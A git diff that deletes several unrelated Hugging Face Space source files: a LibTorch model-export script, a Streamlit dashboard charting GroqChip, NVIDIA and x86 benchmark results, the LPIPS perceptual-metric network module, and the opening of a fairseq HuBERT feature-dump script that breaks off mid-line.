parser.add_argument('--checkpoint', help='checkpoint file', default=None) - parser.add_argument( - '--show', action='store_true', help='show TorchScript graph') - parser.add_argument( - '--verify', action='store_true', help='verify the TorchScript model') - parser.add_argument('--output-file', type=str, default='tmp.pt') - parser.add_argument( - '--shape', - type=int, - nargs='+', - default=[512, 512], - help='input image size (height, width)') - args = parser.parse_args() - return args - - -if __name__ == '__main__': - args = parse_args() - check_torch_version() - - if len(args.shape) == 1: - input_shape = (1, 3, args.shape[0], args.shape[0]) - elif len(args.shape) == 2: - input_shape = ( - 1, - 3, - ) + tuple(args.shape) - else: - raise ValueError('invalid input shape') - - cfg = mmcv.Config.fromfile(args.config) - cfg.model.pretrained = None - - # build the model and load checkpoint - cfg.model.train_cfg = None - segmentor = build_segmentor( - cfg.model, train_cfg=None, test_cfg=cfg.get('test_cfg')) - # convert SyncBN to BN - segmentor = _convert_batchnorm(segmentor) - - if args.checkpoint: - load_checkpoint(segmentor, args.checkpoint, map_location='cpu') - - # convert the PyTorch model to LibTorch model - pytorch2libtorch( - segmentor, - input_shape, - show=args.show, - output_file=args.output_file, - verify=args.verify) diff --git a/spaces/Groq/mlagility/graphs.py b/spaces/Groq/mlagility/graphs.py deleted file mode 100644 index 59ca68fa28b38615a20e1bc0fa2ee0a5c2b66713..0000000000000000000000000000000000000000 --- a/spaces/Groq/mlagility/graphs.py +++ /dev/null @@ -1,807 +0,0 @@ -from collections import Counter -from streamlit_echarts import st_echarts # pylint: disable=import-error -import numpy as np -import pandas as pd -import streamlit as st # pylint: disable=import-error -import plotly.figure_factory as ff -from plotly import graph_objs as go -import plotly.express as px -from statistics import median - -colors = { - "blue": "#5470c6", - "orange": "#FF7F0E", - "green": "#94cc74", - "saffron_mango": "#fac858", - "red": "#ee6666", - "light_blue": "#73c0de", - "ocean_green": "#3ba272", -} -device_colors = { - "x86": colors["blue"], - "nvidia": colors["green"], - "groq": colors["orange"], -} - - -class StageCount: - def __init__(self, df: pd.DataFrame) -> None: - self.all_models = len(df) - self.base_onnx = int(np.sum(df["base_onnx"])) - self.optimized_onnx = int(np.sum(df["optimized_onnx"])) - self.all_ops_supported = int(np.sum(df["all_ops_supported"])) - self.fp16_onnx = int(np.sum(df["fp16_onnx"])) - self.compiles = int(np.sum(df["compiles"])) - self.assembles = int(np.sum(df["assembles"])) - - -class DeviceStageCount: - def __init__(self, df: pd.DataFrame) -> None: - self.all_models = len(df) - self.base_onnx = int(np.sum(df["onnx_exported"])) - self.optimized_onnx = int(np.sum(df["onnx_optimized"])) - self.fp16_onnx = int(np.sum(df["onnx_converted"])) - self.x86 = df.loc[df.x86_latency != "-", "x86_latency"].count() - self.nvidia = df.loc[df.nvidia_latency != "-", "nvidia_latency"].count() - self.groq = df.loc[ - df.groq_estimated_latency != "-", "groq_estimated_latency" - ].count() - - -def stages_count_summary(current_df: pd.DataFrame, prev_df: pd.DataFrame) -> None: - """ - Show count of how many models compile, assemble, etc - """ - current = StageCount(current_df) - prev = StageCount(prev_df) - - kpi = st.columns(7) - - kpi[0].metric( - label="All models", - value=current.all_models, - delta=current.all_models - prev.all_models, - ) - - kpi[1].metric( - label="Converts to ONNX", - value=current.base_onnx, - delta=current.base_onnx - prev.base_onnx, - ) - - kpi[2].metric( - label="Optimizes ONNX file", - value=current.optimized_onnx, - delta=current.optimized_onnx - prev.optimized_onnx, - ) - - kpi[3].metric( - label="Supports all ops", - value=current.all_ops_supported, - delta=current.all_ops_supported - prev.all_ops_supported, - ) - - kpi[4].metric( - label="Converts to FP16", - value=current.fp16_onnx, - delta=current.fp16_onnx - prev.fp16_onnx, - ) - - kpi[5].metric( - label="Compiles", - value=current.compiles, - delta=current.compiles - prev.compiles, - ) - - kpi[6].metric( - label="Assembles", - value=current.assembles, - delta=current.assembles - prev.assembles, - ) - - # Show Sankey graph with percentages - sk_val = { - "All models": "100%", - "Converts to ONNX": str(int(100 * current.base_onnx / current.all_models)) - + "%", - "Optimizes ONNX file": str( - int(100 * current.optimized_onnx / current.all_models) - ) - + "%", - "Supports all ops": str( - int(100 * current.all_ops_supported / current.all_models) - ) - + "%", - "Converts to FP16": str(int(100 * current.fp16_onnx / current.all_models)) - + "%", - "Compiles": str(int(100 * current.compiles / current.all_models)) + "%", - "Assembles": str(int(100 * current.assembles / current.all_models)) + "%", - } - option = { - "series": { - "type": "sankey", - "animationDuration": 1, - "top": "0%", - "bottom": "20%", - "left": "0%", - "right": "13.5%", - "darkMode": "true", - "nodeWidth": 2, - "textStyle": {"fontSize": 16}, - "lineStyle": {"curveness": 0}, - "layoutIterations": 0, - "layout": "none", - "emphasis": {"focus": "adjacency"}, - "data": [ - { - "name": "All models", - "value": sk_val["All models"], - "itemStyle": {"color": "white", "borderColor": "white"}, - }, - { - "name": "Converts to ONNX", - "value": sk_val["Converts to ONNX"], - "itemStyle": {"color": "white", "borderColor": "white"}, - }, - { - "name": "Optimizes ONNX file", - "value": sk_val["Optimizes ONNX file"], - "itemStyle": {"color": "white", "borderColor": "white"}, - }, - { - "name": "Supports all ops", - "value": sk_val["Supports all ops"], - "itemStyle": {"color": "white", "borderColor": "white"}, - }, - { - "name": "Converts to FP16", - "value": sk_val["Converts to FP16"], - "itemStyle": {"color": "white", "borderColor": "white"}, - }, - { - "name": "Compiles", - "value": sk_val["Compiles"], - "itemStyle": {"color": "white", "borderColor": "white"}, - }, - { - "name": "Assembles", - "value": sk_val["Assembles"], - "itemStyle": {"color": "white", "borderColor": "white"}, - }, - ], - "label": { - "position": "insideTopLeft", - "borderWidth": 0, - "fontSize": 16, - "color": "white", - "textBorderWidth": 0, - "formatter": "{c}", - }, - "links": [ - { - "source": "All models", - "target": "Converts to ONNX", - "value": current.base_onnx, - }, - { - "source": "Converts to ONNX", - "target": "Optimizes ONNX file", - "value": current.optimized_onnx, - }, - { - "source": "Optimizes ONNX file", - "target": "Supports all ops", - "value": current.all_ops_supported, - }, - { - "source": "Supports all ops", - "target": "Converts to FP16", - "value": current.fp16_onnx, - }, - { - "source": "Converts to FP16", - "target": "Compiles", - "value": current.compiles, - }, - { - "source": "Compiles", - "target": "Assembles", - "value": current.assembles, - }, - ], - } - } - st_echarts( - options=option, - height="50px", - ) - - -def workload_origin(df: pd.DataFrame) -> None: - """ - Show pie chart that groups models by author - """ - all_authors = list(df.loc[:, "author"]) - author_count = {i: all_authors.count(i) for i in all_authors} - all_models = len(df) - - options = { - "darkMode": "true", - "textStyle": {"fontSize": 16}, - "tooltip": {"trigger": "item"}, - "series": [ - { # "Invisible" chart, used to show author labels - "name": "Name of corpus:", - "type": "pie", - "radius": ["70%", "70%"], - "data": [ - {"value": author_count[k], "name": k} for k in author_count.keys() - ], - "label": { - "formatter": "{b}\n{d}%", - }, - }, - { - # Actual graph where data is shown - "name": "Name of corpus:", - "type": "pie", - "radius": ["50%", "70%"], - "data": [ - {"value": author_count[k], "name": k} for k in author_count.keys() - ], - "emphasis": { - "itemStyle": { - "shadowBlur": 10, - "shadowOffsetX": 0, - "shadowColor": "rgba(0, 0, 0, 0.5)", - } - }, - "label": { - "position": "inner", - "formatter": "{c}", - "color": "black", - "textBorderWidth": 0, - }, - }, - { - # Show total number of models inside - "name": "Total number of models:", - "type": "pie", - "radius": ["0%", "0%"], - "data": [{"value": all_models, "name": "Total"}], - "silent": "true", - "label": { - "position": "inner", - "formatter": "{c}", - "color": "white", - "fontSize": 30, - "textBorderWidth": 0, - }, - }, - ], - } - st_echarts( - options=options, - height="400px", - ) - - -def parameter_histogram(df: pd.DataFrame, show_assembled=True) -> None: - # Add parameters histogram - all_models = [float(x) / 1000000 for x in df["params"] if x != "-"] - - hist_data = [] - group_labels = [] - - if all_models != []: - hist_data.append(all_models) - if show_assembled: - group_labels.append("Models we tried compiling") - else: - group_labels.append("All models") - - if show_assembled: - assembled_models = df[ - df["assembles"] == True # pylint: disable=singleton-comparison - ] - assembled_models = [ - float(x) / 1000000 for x in assembled_models["params"] if x != "-" - ] - if assembled_models != []: - hist_data.append(assembled_models) - group_labels.append("Assembled models") - - if hist_data: - fig = ff.create_distplot( - hist_data, - group_labels, - bin_size=25, - histnorm="", - colors=list(colors.values()), - curve_type="normal", - ) - fig.layout.update(xaxis_title="Parameters in millions") - fig.layout.update(yaxis_title="count") - fig.update_xaxes(range=[1, 1000]) - - st.plotly_chart(fig, use_container_width=True) - - else: - st.markdown( - """At least one model needs to reach the compiler to show this graph 😅""" - ) - - -def speedup_bar_chart_legacy(df: pd.DataFrame) -> None: - """ - This function will be removed when we start getting CPU numbers for the daily tests - """ - - # Prepare data - assembles = np.sum(df["assembles"]) - df = df[["model_name", "groq_nvidia_compute_ratio", "groq_nvidia_e2e_ratio"]] - df = df.sort_values(by=["model_name"]) - df = df[(df.groq_nvidia_compute_ratio != "-")] - df = df[(df.groq_nvidia_e2e_ratio != "-")] - df["groq_nvidia_compute_ratio"] = df["groq_nvidia_compute_ratio"].astype(float) - df["groq_nvidia_e2e_ratio"] = df["groq_nvidia_e2e_ratio"].astype(float) - - if len(df) == 0 and assembles > 0: - st.markdown( - ( - "We do not have GPU numbers for the model(s) mapped to the GroqChip." - " This is potentially due to lack of out-of-the-box TensorRT support." - ) - ) - elif assembles == 0: - st.markdown( - "Nothing to show here since no models have been successfully assembled." - ) - else: - data = [ - go.Bar( - x=df["model_name"], - y=df["groq_nvidia_compute_ratio"], - name="Compute only", - ), - go.Bar( - x=df["model_name"], - y=df["groq_nvidia_e2e_ratio"], - name="Compute + estimated I/O", - ), - ] - - layout = go.Layout( - barmode="overlay", - yaxis_title="Speedup compared to A100 GPU", - colorway=list(colors.values()), - ) - - fig = dict(data=data, layout=layout) - st.plotly_chart(fig, use_container_width=True) - - st.markdown( - ( - "*Estimated I/O does NOT include delays caused by Groq's runtime. " - "See FAQ for details." - ), - unsafe_allow_html=True, - ) - - -def speedup_text_summary_legacy(df: pd.DataFrame) -> None: - # pylint: disable=line-too-long - """ - This function will be removed when we start getting CPU numbers for the daily tests - """ - - # Remove empty elements and convert to float - df = df[(df.groq_nvidia_compute_ratio != "-")] - df = df[(df.groq_nvidia_e2e_ratio != "-")] - df["groq_nvidia_compute_ratio"] = df["groq_nvidia_compute_ratio"].astype(float) - df["groq_nvidia_e2e_ratio"] = df["groq_nvidia_e2e_ratio"].astype(float) - - # Show stats - st.markdown( - f"""





      -

      Average speedup of GroqChip™ considering compute only:

      -

      {round(df["groq_nvidia_compute_ratio"].mean(),2)}x

      -

      min {round(df["groq_nvidia_compute_ratio"].min(),2)}x; median {round(median(df["groq_nvidia_compute_ratio"]),2)}x; max {round(df["groq_nvidia_compute_ratio"].max(),2)}x

      -

      -

      Average speedup of GroqChip™ considering compute + estimated I/O*:

      -

      {round(df["groq_nvidia_e2e_ratio"].mean(),2)}x

      -

      min {round(df["groq_nvidia_e2e_ratio"].min(),2)}x; median {round(median(df["groq_nvidia_e2e_ratio"]),2)}x; max {round(df["groq_nvidia_e2e_ratio"].max(),2)}x

      """, - unsafe_allow_html=True, - ) - - -def process_latency_data(df, baseline): - df = df[["model_name", "groq_estimated_latency", "nvidia_latency", "x86_latency"]] - df = df.rename(columns={"groq_estimated_latency": "groq_latency"}) - df = df.sort_values(by=["model_name"]) - - df.x86_latency.replace(["-"], [float("inf")], inplace=True) - df.nvidia_latency.replace(["-"], [float("inf")], inplace=True) - df.groq_latency.replace(["-"], [float("inf")], inplace=True) - - df["groq_latency"] = df["groq_latency"].astype(float) - df["nvidia_latency"] = df["nvidia_latency"].astype(float) - df["x86_latency"] = df["x86_latency"].astype(float) - - df["groq_compute_ratio"] = df[f"{baseline}_latency"] / df["groq_latency"] - df["nvidia_compute_ratio"] = df[f"{baseline}_latency"] / df["nvidia_latency"] - df["x86_compute_ratio"] = df[f"{baseline}_latency"] / df["x86_latency"] - - return df - - -def speedup_bar_chart(df: pd.DataFrame, baseline) -> None: - - if len(df) == 0: - st.markdown( - ("Nothing to show here since no models have been successfully benchmarked.") - ) - else: - df = process_latency_data(df, baseline) - bar_chart = {} - bar_chart["nvidia"] = go.Bar( - x=df["model_name"], - y=df["nvidia_compute_ratio"], - name="NVIDIA A100", - ) - bar_chart["groq"] = go.Bar( - x=df["model_name"], - y=df["groq_compute_ratio"], - name="GroqChip 1", - ) - bar_chart["x86"] = go.Bar( - x=df["model_name"], - y=df["x86_compute_ratio"], - name="Intel(R) Xeon(R)", - ) - - # Move baseline to the back of the plot - plot_sequence = list(bar_chart.keys()) - plot_sequence.insert(0, plot_sequence.pop(plot_sequence.index(baseline))) - - # Ensure that the baseline is the last bar - data = [bar_chart[device_type] for device_type in plot_sequence] - color_sequence = [device_colors[device_type] for device_type in plot_sequence] - - layout = go.Layout( - barmode="overlay", # group - legend={ - "orientation": "h", - "xanchor": "center", - "x": 0.5, - "y": 1.2, - }, - yaxis_title="Latency Speedup", - colorway=color_sequence, - height=500, - ) - - fig = dict(data=data, layout=layout) - st.plotly_chart(fig, use_container_width=True) - - st.markdown( - "*Estimated I/O does NOT include delays caused by Groq's runtime.", - unsafe_allow_html=True, - ) - - -def kpi_to_markdown( - compute_ratio, device, num_baseline_models, is_baseline=False, color="blue" -): - - if is_baseline: - title = f"""

      -

      Median {device} Acceleration ({len(compute_ratio)} models):

      """ - return ( - title - + f"""

      {1}x (Baseline)

      """ - ) - - title = f"""

      -

      Median {device} Acceleration ({len(compute_ratio)}/{num_baseline_models} models):

      """ - - if len(compute_ratio) > 0: - kpi_min, kpi_median, kpi_max = ( - round(compute_ratio.min(), 2), - round(median(compute_ratio), 2), - round(compute_ratio.max(), 2), - ) - else: - kpi_min, kpi_median, kpi_max = 0, 0, 0 - - return ( - title - + f"""

      {kpi_median}x

      -

      min {kpi_min}x; max {kpi_max}x

      - """ - ) - - -def speedup_text_summary(df: pd.DataFrame, baseline) -> None: - - df = process_latency_data(df, baseline) - - # Some latencies are "infinite" because they could not be calculated - # To calculate statistics, we remove all elements of df where the baseline latency is inf - df = df[(df[baseline + "_latency"] != float("inf"))] - - # Setting latencies that could not be calculated to infinity also causes some compute ratios to be zero - # We remove those to avoid doing any calculations with infinite latencies - x86_compute_ratio = df["x86_compute_ratio"].to_numpy() - nvidia_compute_ratio = df["nvidia_compute_ratio"].to_numpy() - groq_compute_ratio = df["groq_compute_ratio"].to_numpy() - x86_compute_ratio = x86_compute_ratio[x86_compute_ratio != 0] - nvidia_compute_ratio = nvidia_compute_ratio[nvidia_compute_ratio != 0] - groq_compute_ratio = groq_compute_ratio[groq_compute_ratio != 0] - - num_baseline_models = len(df[f"{baseline}_compute_ratio"]) - x86_text = kpi_to_markdown( - x86_compute_ratio, - device="Intel(R) Xeon(R) X40 CPU @ 2.00GHz", - num_baseline_models=num_baseline_models, - color="blue", - is_baseline=baseline == "x86", - ) - groq_text = kpi_to_markdown( - groq_compute_ratio, - device="GroqChip 1 Estimated", - num_baseline_models=num_baseline_models, - color="orange", - is_baseline=baseline == "groq", - ) - nvidia_text = kpi_to_markdown( - nvidia_compute_ratio, - device="NVIDIA A100-PCIE-40GB", - num_baseline_models=num_baseline_models, - color="green", - is_baseline=baseline == "nvidia", - ) - - cols = st.columns(3) - with cols[0]: - st.markdown(f"""{x86_text}""", unsafe_allow_html=True) - with cols[1]: - st.markdown(f"""{nvidia_text}""", unsafe_allow_html=True) - with cols[2]: - st.markdown(f"""{groq_text}""", unsafe_allow_html=True) - - -def compiler_errors(df: pd.DataFrame) -> None: - compiler_errors = df[df["compiler_error"] != "-"]["compiler_error"] - compiler_errors = Counter(compiler_errors) - if len(compiler_errors) > 0: - compiler_errors = pd.DataFrame.from_dict( - compiler_errors, orient="index" - ).reset_index() - compiler_errors = compiler_errors.set_axis( - ["error", "count"], axis=1, inplace=False - ) - compiler_errors["error"] = [ce[:80] for ce in compiler_errors["error"]] - fig = px.bar( - compiler_errors, - x="count", - y="error", - orientation="h", - height=400, - ) - fig.update_traces(marker_color=colors["blue"]) - - st.plotly_chart(fig, use_container_width=True) - else: - st.markdown("""No compiler errors found :tada:""") - - -def io_fraction(df: pd.DataFrame) -> None: - fig = go.Figure() - for chips in ["1", "2", "4", "8"]: - tmp = df[[model_entry == chips for model_entry in df["groq_chips_used"]]] - if len(tmp) == 0: - continue - tmp = tmp[[model_entry != "-" for model_entry in tmp["groq_compute_latency"]]] - if len(tmp) == 0: - continue - tmp = tmp[[model_entry != "-" for model_entry in tmp["groq_latency"]]] - if len(tmp) == 0: - continue - print(len(tmp)) - compute_latency = tmp["groq_compute_latency"].astype("float") - e2e_latency = tmp["groq_latency"].astype("float") - - io_fraction = 1 - compute_latency / e2e_latency - if chips == "1": - name = f"{chips} GroqChip ({len(tmp)} models)" - else: - name = f"{chips} GroqChips \n({len(tmp)} models)" - fig.add_trace( - go.Box( - y=io_fraction, - name=name, - ) - ) - - fig.layout.update(xaxis_title="Models compiled for X GroqChip Processors") - fig.layout.update(yaxis_title="Estimated fraction of time (in %) spent on I/O") - fig.layout.update(colorway=list(colors.values())) - st.plotly_chart(fig, use_container_width=True) - - -def results_table(df: pd.DataFrame): - model_name = st.text_input("", placeholder="Filter model by name") - if model_name != "": - df = df[[model_name in x for x in df["Model Name"]]] - - st.dataframe(df, height=min((len(df) + 1) * 35, 35 * 21)) - - -def device_funnel_metrics(num_models: int, num_total_models: int) -> str: - """ - Calculates the percentage between models and total_models - Avoids ZeroDivisionError when dividend is zero - """ - models_message = f"{num_models} model" - models_message = models_message + "s" if num_models != 1 else models_message - percentage_message = "" - if num_total_models > 0: - model_ratio = num_models / num_total_models - if model_ratio < 0.01 and model_ratio != 0: - percentage_message = " - < 1%" - else: - percentage_message = f" - {int(100*num_models / num_total_models)}%" - return f"{models_message}{percentage_message}" - - -def device_funnel(df: pd.DataFrame) -> None: - """ - Show count of how many models compile, assemble, etc - """ - summ = DeviceStageCount(df) - - stages = [ - "All models", - "Export to ONNX", - "Optimize ONNX file", - "Convert to FP16", - "Acquire Performance", - ] - cols = st.columns(len(stages)) - - for idx, stage in enumerate(stages): - with cols[idx]: - st.markdown(stage) - - # Show Sankey graph with percentages - sk_val = { - "All models": device_funnel_metrics(summ.all_models, summ.all_models), - "Converts to ONNX": device_funnel_metrics(summ.base_onnx, summ.all_models), - "Optimizes ONNX file": device_funnel_metrics( - summ.optimized_onnx, summ.all_models - ), - "Converts to FP16": device_funnel_metrics(summ.fp16_onnx, summ.all_models), - "Acquires Nvidia Perf": device_funnel_metrics(summ.nvidia, summ.all_models) - + " (Nvidia)", - "Acquires Groq Perf": device_funnel_metrics(summ.groq, summ.all_models) - + " (Groq)", - "Acquires x86 Perf": device_funnel_metrics(summ.x86, summ.all_models) - + " (x86)", - } - - # Calculate bar heights for each of the devices - # Bar height is proportional to the number of models benchmarked by each device - default_bar_size = 1 - target_combined_height = max(default_bar_size, summ.fp16_onnx) - device_bar_size = target_combined_height / 3 - - option = { - "series": { - "type": "sankey", - "animationDuration": 1, - "top": "0%", - "bottom": "20%", - "left": "0%", - "right": "19%", - "darkMode": "true", - "nodeWidth": 2, - "textStyle": {"fontSize": 16}, - "nodeAlign": "left", - "lineStyle": {"curveness": 0}, - "layoutIterations": 0, - "nodeGap": 12, - "layout": "none", - "emphasis": {"focus": "adjacency"}, - "data": [ - { - "name": "All models", - "value": sk_val["All models"], - "itemStyle": {"color": "white", "borderColor": "white"}, - }, - { - "name": "Converts to ONNX", - "value": sk_val["Converts to ONNX"], - "itemStyle": {"color": "white", "borderColor": "white"}, - }, - { - "name": "Optimizes ONNX file", - "value": sk_val["Optimizes ONNX file"], - "itemStyle": {"color": "white", "borderColor": "white"}, - }, - { - "name": "Converts to FP16", - "value": sk_val["Converts to FP16"], - "itemStyle": {"color": "white", "borderColor": "white"}, - }, - { - "name": "Acquires Nvidia Perf", - "value": sk_val["Acquires Nvidia Perf"], - "itemStyle": { - "color": device_colors["nvidia"], - "borderColor": device_colors["nvidia"], - }, - }, - { - "name": "Acquires Groq Perf", - "value": sk_val["Acquires Groq Perf"], - "itemStyle": { - "color": device_colors["groq"], - "borderColor": device_colors["groq"], - }, - }, - { - "name": "Acquires x86 Perf", - "value": sk_val["Acquires x86 Perf"], - "itemStyle": { - "color": device_colors["x86"], - "borderColor": device_colors["x86"], - }, - }, - ], - "label": { - "position": "insideTopLeft", - "borderWidth": 0, - "fontSize": 16, - "color": "white", - "textBorderWidth": 0, - "formatter": "{c}", - }, - "links": [ - { - "source": "All models", - "target": "Converts to ONNX", - "value": max(default_bar_size, summ.all_models), - }, - { - "source": "Converts to ONNX", - "target": "Optimizes ONNX file", - "value": max(default_bar_size, summ.optimized_onnx), - }, - { - "source": "Optimizes ONNX file", - "target": "Converts to FP16", - "value": max(default_bar_size, summ.fp16_onnx), - }, - { - "source": "Converts to FP16", - "target": "Acquires Nvidia Perf", - "value": device_bar_size, - }, - { - "source": "Converts to FP16", - "target": "Acquires Groq Perf", - "value": device_bar_size, - }, - { - "source": "Converts to FP16", - "target": "Acquires x86 Perf", - "value": device_bar_size, - }, - ], - } - } - st_echarts( - options=option, - height="70px", - ) diff --git a/spaces/HaHaBill/LandShapes-Antarctica/models/stylegan2/stylegan2-pytorch/lpips/networks_basic.py b/spaces/HaHaBill/LandShapes-Antarctica/models/stylegan2/stylegan2-pytorch/lpips/networks_basic.py deleted file mode 100644 index 1d23f059de02880ed65d425d56baf0c03a9e99a6..0000000000000000000000000000000000000000 --- a/spaces/HaHaBill/LandShapes-Antarctica/models/stylegan2/stylegan2-pytorch/lpips/networks_basic.py +++ /dev/null @@ -1,187 +0,0 @@ - -from __future__ import absolute_import - -import sys -import torch -import torch.nn as nn -import torch.nn.init as init -from torch.autograd import Variable -import numpy as np -from pdb import set_trace as st -from skimage import color -from IPython import embed -from . import pretrained_networks as pn - -import lpips as util - -def spatial_average(in_tens, keepdim=True): - return in_tens.mean([2,3],keepdim=keepdim) - -def upsample(in_tens, out_H=64): # assumes scale factor is same for H and W - in_H = in_tens.shape[2] - scale_factor = 1.*out_H/in_H - - return nn.Upsample(scale_factor=scale_factor, mode='bilinear', align_corners=False)(in_tens) - -# Learned perceptual metric -class PNetLin(nn.Module): - def __init__(self, pnet_type='vgg', pnet_rand=False, pnet_tune=False, use_dropout=True, spatial=False, version='0.1', lpips=True): - super(PNetLin, self).__init__() - - self.pnet_type = pnet_type - self.pnet_tune = pnet_tune - self.pnet_rand = pnet_rand - self.spatial = spatial - self.lpips = lpips - self.version = version - self.scaling_layer = ScalingLayer() - - if(self.pnet_type in ['vgg','vgg16']): - net_type = pn.vgg16 - self.chns = [64,128,256,512,512] - elif(self.pnet_type=='alex'): - net_type = pn.alexnet - self.chns = [64,192,384,256,256] - elif(self.pnet_type=='squeeze'): - net_type = pn.squeezenet - self.chns = [64,128,256,384,384,512,512] - self.L = len(self.chns) - - self.net = net_type(pretrained=not self.pnet_rand, requires_grad=self.pnet_tune) - - if(lpips): - self.lin0 = NetLinLayer(self.chns[0], use_dropout=use_dropout) - self.lin1 = NetLinLayer(self.chns[1], use_dropout=use_dropout) - self.lin2 = NetLinLayer(self.chns[2], use_dropout=use_dropout) - self.lin3 = NetLinLayer(self.chns[3], use_dropout=use_dropout) - self.lin4 = NetLinLayer(self.chns[4], use_dropout=use_dropout) - self.lins = [self.lin0,self.lin1,self.lin2,self.lin3,self.lin4] - if(self.pnet_type=='squeeze'): # 7 layers for squeezenet - self.lin5 = NetLinLayer(self.chns[5], use_dropout=use_dropout) - self.lin6 = NetLinLayer(self.chns[6], use_dropout=use_dropout) - self.lins+=[self.lin5,self.lin6] - - def forward(self, in0, in1, retPerLayer=False): - # v0.0 - original release had a bug, where input was not scaled - in0_input, in1_input = (self.scaling_layer(in0), self.scaling_layer(in1)) if self.version=='0.1' else (in0, in1) - outs0, outs1 = self.net.forward(in0_input), self.net.forward(in1_input) - feats0, feats1, diffs = {}, {}, {} - - for kk in range(self.L): - feats0[kk], feats1[kk] = util.normalize_tensor(outs0[kk]), util.normalize_tensor(outs1[kk]) - diffs[kk] = (feats0[kk]-feats1[kk])**2 - - if(self.lpips): - if(self.spatial): - res = [upsample(self.lins[kk].model(diffs[kk]), out_H=in0.shape[2]) for kk in range(self.L)] - else: - res = [spatial_average(self.lins[kk].model(diffs[kk]), keepdim=True) for kk in range(self.L)] - else: - if(self.spatial): - res = [upsample(diffs[kk].sum(dim=1,keepdim=True), out_H=in0.shape[2]) for kk in range(self.L)] - else: - res = [spatial_average(diffs[kk].sum(dim=1,keepdim=True), keepdim=True) for kk in range(self.L)] - - val = res[0] - for l in range(1,self.L): - val += res[l] - - if(retPerLayer): - return (val, res) - else: - return val - -class ScalingLayer(nn.Module): - def __init__(self): - super(ScalingLayer, self).__init__() - self.register_buffer('shift', torch.Tensor([-.030,-.088,-.188])[None,:,None,None]) - self.register_buffer('scale', torch.Tensor([.458,.448,.450])[None,:,None,None]) - - def forward(self, inp): - return (inp - self.shift) / self.scale - - -class NetLinLayer(nn.Module): - ''' A single linear layer which does a 1x1 conv ''' - def __init__(self, chn_in, chn_out=1, use_dropout=False): - super(NetLinLayer, self).__init__() - - layers = [nn.Dropout(),] if(use_dropout) else [] - layers += [nn.Conv2d(chn_in, chn_out, 1, stride=1, padding=0, bias=False),] - self.model = nn.Sequential(*layers) - - -class Dist2LogitLayer(nn.Module): - ''' takes 2 distances, puts through fc layers, spits out value between [0,1] (if use_sigmoid is True) ''' - def __init__(self, chn_mid=32, use_sigmoid=True): - super(Dist2LogitLayer, self).__init__() - - layers = [nn.Conv2d(5, chn_mid, 1, stride=1, padding=0, bias=True),] - layers += [nn.LeakyReLU(0.2,True),] - layers += [nn.Conv2d(chn_mid, chn_mid, 1, stride=1, padding=0, bias=True),] - layers += [nn.LeakyReLU(0.2,True),] - layers += [nn.Conv2d(chn_mid, 1, 1, stride=1, padding=0, bias=True),] - if(use_sigmoid): - layers += [nn.Sigmoid(),] - self.model = nn.Sequential(*layers) - - def forward(self,d0,d1,eps=0.1): - return self.model.forward(torch.cat((d0,d1,d0-d1,d0/(d1+eps),d1/(d0+eps)),dim=1)) - -class BCERankingLoss(nn.Module): - def __init__(self, chn_mid=32): - super(BCERankingLoss, self).__init__() - self.net = Dist2LogitLayer(chn_mid=chn_mid) - # self.parameters = list(self.net.parameters()) - self.loss = torch.nn.BCELoss() - - def forward(self, d0, d1, judge): - per = (judge+1.)/2. - self.logit = self.net.forward(d0,d1) - return self.loss(self.logit, per) - -# L2, DSSIM metrics -class FakeNet(nn.Module): - def __init__(self, use_gpu=True, colorspace='Lab'): - super(FakeNet, self).__init__() - self.use_gpu = use_gpu - self.colorspace=colorspace - -class L2(FakeNet): - - def forward(self, in0, in1, retPerLayer=None): - assert(in0.size()[0]==1) # currently only supports batchSize 1 - - if(self.colorspace=='RGB'): - (N,C,X,Y) = in0.size() - value = torch.mean(torch.mean(torch.mean((in0-in1)**2,dim=1).view(N,1,X,Y),dim=2).view(N,1,1,Y),dim=3).view(N) - return value - elif(self.colorspace=='Lab'): - value = util.l2(util.tensor2np(util.tensor2tensorlab(in0.data,to_norm=False)), - util.tensor2np(util.tensor2tensorlab(in1.data,to_norm=False)), range=100.).astype('float') - ret_var = Variable( torch.Tensor((value,) ) ) - if(self.use_gpu): - ret_var = ret_var.cuda() - return ret_var - -class DSSIM(FakeNet): - - def forward(self, in0, in1, retPerLayer=None): - assert(in0.size()[0]==1) # currently only supports batchSize 1 - - if(self.colorspace=='RGB'): - value = util.dssim(1.*util.tensor2im(in0.data), 1.*util.tensor2im(in1.data), range=255.).astype('float') - elif(self.colorspace=='Lab'): - value = util.dssim(util.tensor2np(util.tensor2tensorlab(in0.data,to_norm=False)), - util.tensor2np(util.tensor2tensorlab(in1.data,to_norm=False)), range=100.).astype('float') - ret_var = Variable( torch.Tensor((value,) ) ) - if(self.use_gpu): - ret_var = ret_var.cuda() - return ret_var - -def print_network(net): - num_params = 0 - for param in net.parameters(): - num_params += param.numel() - print('Network',net) - print('Total number of parameters: %d' % num_params) diff --git a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/examples/hubert/simple_kmeans/dump_hubert_feature_s2t.py b/spaces/HarryLee/eCommerceImageCaptioning/fairseq/examples/hubert/simple_kmeans/dump_hubert_feature_s2t.py deleted file mode 100644 index 6fff4faf44a92d42504559ecea8ec1047d2e5f14..0000000000000000000000000000000000000000 --- a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/examples/hubert/simple_kmeans/dump_hubert_feature_s2t.py +++ /dev/null @@ -1,92 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import csv -import io -import logging -import os -import os.path as op -import sys - -from dump_hubert_feature import HubertFeatureReader -from feature_utils import get_shard_range, dump_feature -from fairseq.data.audio.audio_utils import get_waveform -from fairseq.data.audio.speech_to_text_dataset import ( - read_from_uncompressed_zip, -) - - -logging.basicConfig( - format="%(asctime)s | %(levelname)s | %(name)s | %(message)s", - datefmt="%Y-%m-%d %H:%M:%S", - level=os.environ.get("LOGLEVEL", "INFO").upper(), - stream=sys.stdout, -) -logger = logging.getLogger("dump_hubert_feature_s2t") - - -class HubertFeatureReaderS2T(HubertFeatureReader): - def read_audio(self, path, ref_len=None): - path, *extra = path.split(":") - assert len(extra) == 2 - assert path.endswith(".zip") - - data = read_from_uncompressed_zip(path, int(extra[0]), int(extra[1])) - f = io.BytesIO(data) - wav, sr = get_waveform(f) - assert sr == self.task.cfg.sample_rate, sr - if wav.ndim == 2: - wav = wav.mean(-1) - assert wav.ndim == 1, wav.ndim - if ref_len is not None and abs(ref_len - len(wav)) > 160: - logging.warning(f"ref {ref_len} != read {len(wav)} ({path})") - return wav - - -def get_path_iterator(root, tsv, nshard, rank): - with open(tsv) as f: - reader = 